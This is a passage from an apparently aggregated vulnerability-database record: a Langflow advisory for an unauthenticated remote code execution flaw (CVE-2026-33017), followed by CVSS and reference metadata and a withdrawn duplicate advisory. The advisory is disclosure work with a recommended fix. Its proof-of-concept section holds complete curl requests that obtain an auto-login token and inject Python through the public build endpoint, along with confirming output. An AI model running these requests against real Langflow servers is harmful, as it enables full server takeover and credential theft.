        flow_id=new_flow_id,
        data=data,  # Attacker's data passed directly to graph builder
        current_user=owner_user,
        ...
    )
```

Compare with the authenticated build endpoint at line 138, which requires `current_user: CurrentActiveUser`.

### Code Execution Chain

When attacker-supplied `data` is provided, it flows through:

1. `start_flow_build(data=attacker_data)` → `generate_flow_events()` -- `build.py:81`
2. `create_graph()` → `build_graph_from_data(payload=data.model_dump())` -- `build.py:298`
3. `Graph.from_payload(payload)` parses attacker nodes -- `base.py:1168`
4. `add_nodes_and_edges()` → `initialize()` → `_build_graph()` -- `base.py:270,527`
5. `_instantiate_components_in_vertices()` iterates nodes -- `base.py:1323`
6. `vertex.instantiate_component()` → `instantiate_class(vertex)` -- `loading.py:28`
7. `code = custom_params.pop("code")` extracts attacker code -- `loading.py:43`
8. `eval_custom_component_code(code)` → `create_class(code, class_name)` -- `eval.py:9`
9. `prepare_global_scope(module)` -- `validate.py:323`
10. `exec(compiled_code, exec_globals)` -- **ARBITRARY CODE EXECUTION** -- `validate.py:397`

### Unsandboxed exec() in prepare_global_scope

**File:** `src/lfx/src/lfx/custom/validate.py`, lines 340-397

```python
def prepare_global_scope(module):
    exec_globals = globals().copy()

    # Imports are resolved first (any module can be imported)
    for node in imports:
        module_obj = importlib.import_module(module_name)  # line 352
        exec_globals[variable_name] = module_obj

    # Then ALL top-level definitions are executed (Assign, ClassDef, FunctionDef)
    if definitions:
        combined_module = ast.Module(body=definitions, type_ignores=[])
        compiled_code = compile(combined_module, "<string>", "exec")
        exec(compiled_code, exec_globals)  # line 397 - ARBITRARY CODE EXECUTION
```

**Critical detail:** `prepare_global_scope` executes `ast.Assign` nodes. An attacker's code like `_x = os.system("id")` is an assignment and will be executed during graph building -- before the flow even "runs."

## Prerequisites

1. Target Langflow instance has at least **one public flow** (common for demos, chatbots, shared workflows)
2. Attacker knows the public flow's UUID (discoverable via shared links/URLs)
3. No authentication required -- only a `client_id` cookie (any arbitrary string value)

When `AUTO_LOGIN=true` (the **default**), all prerequisites can be met by an unauthenticated attacker:
1. `GET /api/v1/auto_login` → obtain superuser token
2. `POST /api/v1/flows/` → create a public flow
3. Exploit via `build_public_tmp` without any auth

## Proof of Concept

### Tested Against

- **Langflow version 1.7.3** (latest stable release, installed via `pip install langflow`)
- **Fully reproducible**: 6/6 runs confirmed RCE (two sets of 3 runs each)

### Step 1: Obtain a Public Flow ID

(In a real attack, the attacker discovers this via shared links. For the PoC, we create one via AUTO_LOGIN.)

```bash
# Get superuser token (no credentials needed when AUTO_LOGIN=true)
TOKEN=$(curl -s http://localhost:7860/api/v1/auto_login | jq -r '.access_token')

# Create a public flow
FLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"name":"test","data":{"nodes":[],"edges":[]},"access_type":"PUBLIC"}' \
  | jq -r '.id')

echo "Public Flow ID: $FLOW_ID"
```

### Step 2: Exploit -- Unauthenticated RCE

```bash
# EXPLOIT: Send malicious flow data to the UNAUTHENTICATED endpoint
# NO Authorization header, NO API key, NO credentials
curl -X POST "http://localhost:7860/api/v1/build_public_tmp/${FLOW_ID}/flow" \
  -H "Content-Type: application/json" \
  -b "client_id=attacker" \
  -d '{
    "data": {
      "nodes": [{
        "id": "Exploit-001",
        "type": "genericNode",
        "position": {"x":0,"y":0},
        "data": {
          "id": "Exploit-001",
          "type": "ExploitComp",
          "node": {
            "template": {
              "code": {
                "type": "code",
                "required": true,
                "show": true,
                "multiline": true,
                "value": "import os, socket, json as _json\n\n_proof = os.popen(\"id\").read().strip()\n_host = socket.gethostname()\n_write = open(\"/tmp/rce-proof\",\"w\").write(f\"{_proof} on {_host}\")\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n    display_name=\"X\"\n    outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n    def r(self)->Data:\n        return Data(data={})",
                "name": "code",
                "password": false,
                "advanced": false,
                "dynamic": false
              },
              "_type": "Component"
            },
            "description": "X",
            "base_classes": ["Data"],
            "display_name": "ExploitComp",
            "name": "ExploitComp",
            "frozen": false,
            "outputs": [{"types":["Data"],"selected":"Data","name":"o","display_name":"O","method":"r","value":"__UNDEFINED__","cache":true,"allows_loop":false,"tool_mode":false,"hidden":null,"required_inputs":null,"group_outputs":false}],
            "field_order": ["code"],
            "beta": false,
            "edited": false
          }
        }
      }],
      "edges": []
    },
    "inputs": null
  }'
```

### Step 3: Verify Code Execution

```bash
# Wait 2 seconds for async graph building
sleep 2

# Check proof file written by attacker's code on the server
cat /tmp/rce-proof
# Output: uid=1000(aviral) gid=1000(aviral) groups=... on kali
```

### Actual Test Results

```
======================================================================
LANGFLOW v1.7.3 UNAUTHENTICATED RCE - DEFINITIVE E2E TEST
======================================================================
Version:  Langflow 1.7.3

RUN 1: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
  HTTP 200 - Job ID: d8db19bf-a532-4f9d-a368-9c46d6235c19
  *** REMOTE CODE EXECUTION CONFIRMED ***
    canary: RCE-f0d19b36
    hostname: kali
    uid: 1000
    whoami: aviral
    id: uid=1000(aviral) gid=1000(aviral) groups=1000(aviral),...
    uname: Linux 6.16.8+kali-amd64

RUN 2: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
  HTTP 200 - Job ID: d2e24f20-d707-4278-868c-583dd7532832
  *** REMOTE CODE EXECUTION CONFIRMED ***
    canary: RCE-6037a271

RUN 3: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
  HTTP 200 - Job ID: 5962244a-42af-4ef6-b134-a6a4adba5ab7
  *** REMOTE CODE EXECUTION CONFIRMED ***
    canary: RCE-4a796556

FINAL RESULTS
  Total checks:   15
  VULNERABLE:     15
  SAFE:           0
  RCE confirmed:  3/3 runs
  Reproducible:   YES (100%)
```

## Impact

- **Unauthenticated Remote Code Execution** with full server process privileges
- **Complete server compromise**: arbitrary file read/write, command execution
- **Environment variable exfiltration**: API keys, database credentials, cloud tokens (confirmed in PoC: env_keys exfiltrated)
- **Reverse shell access** for persistent access
- **Lateral movement** within the network
- **Data exfiltration** from all flows, messages, and stored credentials in the database

## Comparison with CVE-2025-3248

| Aspect | CVE-2025-3248 | This Vulnerability |
|--------|--------------|-------------------|
| **Endpoint** | `/api/v1/validate/code` | `/api/v1/build_public_tmp/{id}/flow` |
| **Fix applied** | Added `Depends(get_current_active_user)` | None -- NEW vulnerability |
| **Root cause** | Missing auth on code validation | Unauthenticated endpoint accepts attacker-controlled executable code via `data` param |
| **Code execution via** | `validate_code()` → `exec()` | `create_class()` → `prepare_global_scope()` → `exec()` |
| **CISA KEV** | Yes (actively exploited) | N/A (new finding) |
| **Can simple auth fix?** | Yes (and it was fixed) | No -- endpoint is *designed* to be unauthenticated; the `data` parameter must be removed |

## Recommended Fix

### Immediate (Short-term)

**Remove the `data` parameter** from `build_public_tmp`. Public flows should only execute their stored flow data, never attacker-supplied data:

```python
@router.post("/build_public_tmp/{flow_id}/flow")
async def build_public_tmp(
    *,
    flow_id: uuid.UUID,
    inputs: Annotated[InputValueRequest | None, Body(embed=True)] = None,
    # REMOVED: data parameter -- public flows must use stored data only
    ...
):
```

In `generate_flow_events` → `create_graph()`, only the `build_graph_from_db` path should be reachable for unauthenticated requests:

```python
async def create_graph(fresh_session, flow_id_str, flow_name):
    # For public flows, ALWAYS load from database, never from user data
    return await build_graph_from_db(
        flow_id=flow_id,
        session=fresh_session,
        ...
    )
```
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-33017
reference_id
reference_type
scores
0
value 0.24652
scoring_system epss
scoring_elements 0.96242
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-33017
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Act
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-26T03:55:25Z/
url https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0
3
reference_url https://github.com/langflow-ai/langflow/issues/12345
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/issues/12345
4
reference_url https://github.com/langflow-ai/langflow/pull/12160
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/pull/12160
5
reference_url https://github.com/langflow-ai/langflow/releases/tag/1.8.2
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/releases/tag/1.8.2
6
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Act
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-26T03:55:25Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx
7
reference_url https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-33017
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-33017
9
reference_url https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-33017
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-33017
10
reference_url https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017
11
reference_url https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours
12
reference_url https://github.com/advisories/GHSA-rvqx-wpfh-mfx7
reference_id GHSA-rvqx-wpfh-mfx7
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A
2
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Act
scoring_system ssvc
scoring_elements SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-26T03:55:25Z/
url https://github.com/advisories/GHSA-rvqx-wpfh-mfx7
13
reference_url https://github.com/advisories/GHSA-vwmf-pq79-vjvx
reference_id GHSA-vwmf-pq79-vjvx
reference_type
scores
url https://github.com/advisories/GHSA-vwmf-pq79-vjvx
fixed_packages
aliases CVE-2026-33017, GHSA-vwmf-pq79-vjvx
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zqwj-45w7-7kft
21
url VCID-ztx2-wefa-c7bk
vulnerability_id VCID-ztx2-wefa-c7bk
summary 
Duplicate Advisory: Langflow Vulnerable to Code Injection via the `/api/v1/validate/code` endpoint
### Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-rvqx-wpfh-mfx7. This link is maintained to preserve external references.

### Original Description

Langflow versions prior to 1.3.0 are susceptible to code injection in the `/api/v1/validate/code` endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
references
0
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
1
reference_url https://github.com/langflow-ai/langflow/pull/6911
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/pull/6911
2
reference_url https://github.com/langflow-ai/langflow/releases/tag/1.3.0
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/releases/tag/1.3.0
3
reference_url https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-3248
reference_id CVE-2025-3248
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-3248
5
reference_url https://github.com/advisories/GHSA-c995-4fw3-j39m
reference_id GHSA-c995-4fw3-j39m
reference_type
scores
url https://github.com/advisories/GHSA-c995-4fw3-j39m
fixed_packages
0
url pkg:pypi/langflow@1.3.0
purl pkg:pypi/langflow@1.3.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1dek-kvzf-27d1
1
vulnerability VCID-1ynd-c2hz-53hx
2
vulnerability VCID-2195-gd33-xbdp
3
vulnerability VCID-2649-thqq-r3d2
4
vulnerability VCID-4swq-hbjm-3ucd
5
vulnerability VCID-bb6r-1f6u-t7ed
6
vulnerability VCID-fc5h-qc2t-xqc3
7
vulnerability VCID-ncvf-vzqr-uydz
8
vulnerability VCID-q4r1-xjfk-7bg9
9
vulnerability VCID-qwtw-q92t-quhz
10
vulnerability VCID-rc54-gw71-gyau
11
vulnerability VCID-rrva-95s5-kbcf
12
vulnerability VCID-sbea-kkfu-akgb
13
vulnerability VCID-u8mw-7znw-rfab
14
vulnerability VCID-v5pc-pdm9-97g8
15
vulnerability VCID-ypxh-x2hy-3uhb
16
vulnerability VCID-ysnc-jyxb-6qcy
17
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.3.0
aliases GHSA-c995-4fw3-j39m
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ztx2-wefa-c7bk
Fixing_vulnerabilities
Risk_score10.0
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:pypi/langflow@0.5.0a0